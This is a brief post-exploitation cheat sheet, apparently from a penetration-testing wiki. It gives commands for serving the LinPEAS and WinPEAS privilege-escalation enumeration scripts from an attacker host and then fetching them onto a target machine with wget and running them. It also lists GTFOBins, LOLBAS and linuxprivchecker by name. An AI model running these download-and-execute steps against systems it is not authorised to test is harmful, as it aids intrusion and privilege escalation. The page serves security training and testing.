Tools and Utilities

Here we can find some tools and utilities commonly used for practices related to post-exploitation:

LinPEAS

Commands

  • Installation

sudo apt install peass

  • Usage

#Host machine
linpeas
python3 -m http.server $port #Create server to send file

#Target machine
cd /tmp
wget http://$hostIP:$port/linpeas.sh
bash linpeas.sh

WinPEAS

Commands

  • Usage

#Host machine
wget https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe
python3 -m http.server $port #Create server to send file

#Target machine
wget http://$hostIP:$port/winPEASx64.exe
.\winPEASx64.exe

GTFOBins

LOLBAS

linuxprivchecker

Last updated